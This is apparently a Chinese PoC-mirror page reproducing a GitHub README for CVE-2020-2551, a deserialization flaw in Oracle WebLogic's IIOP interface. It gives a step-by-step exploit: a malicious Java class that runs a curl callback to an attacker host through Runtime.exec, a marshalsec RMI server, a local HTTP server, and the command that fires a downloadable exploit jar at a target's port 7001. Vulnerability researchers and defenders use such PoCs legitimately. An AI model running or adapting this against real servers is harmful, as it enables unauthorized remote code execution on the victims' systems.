CVE-2020-2551 PoC — Oracle Fusion Middleware WebLogic Server 安全漏洞

来源

https://github.com/Y4er/CVE-2020-2551

关联漏洞

标题:Oracle Fusion Middleware WebLogic Server 安全漏洞 (CVE-2020-2551)
Description:Oracle Fusion Middleware（Oracle融合中间件）和Oracle WebLogic Server都是美国甲骨文（Oracle）公司的产品。Oracle Fusion Middleware是一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。Oracle WebLogic Server是一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整

Description

Weblogic IIOP CVE-2020-2551

介绍

## CVE-2020-2551
Weblogic IIOP 反序列化

## 测试环境
Weblogic10.3.6+jdk1.6

[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码：a6ob 

## 漏洞利用
下载jar包，然后使用marshalsec起一个恶意的RMI服务，本地编译一个exp.java
```java
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```

**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器

```
python -m http.server --bind 0.0.0.0 80
```

命令行运行jar包
```
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
```
实际效果如图
![image](https://user-images.githubusercontent.com/40487319/75524749-81804100-5a49-11ea-8409-20746ca09299.gif)

## 已知问题
很多小伙伴都说复现不成功，看了网上的一些文章发现IIOP存在nat模式的问题，今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。

## 参考

https://y4er.com/post/weblogic-cve-2020-2551/

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2020-2551 PoC — Oracle Fusion Middleware WebLogic Server 安全漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！